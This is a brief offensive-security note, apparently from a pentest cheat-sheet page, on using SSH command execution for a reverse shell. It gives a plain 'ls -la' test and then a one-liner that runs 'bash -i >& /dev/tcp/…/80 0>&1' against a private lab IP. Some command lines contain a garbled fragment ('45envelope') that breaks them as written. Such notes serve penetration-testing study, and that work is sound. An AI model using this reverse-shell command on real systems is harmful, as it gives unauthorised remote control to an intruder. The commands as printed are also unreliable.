If attacker face any error ( except wrong cred obivously) . he can try reverse shell through it
ssh user@192.168.119.45envelope “ls -la”
reverse shell, ssh user@192.168.119.45envelope “bash -i >& /dev/tcp/192.168.119.45/80 0>&1”
Last updated 2 years ago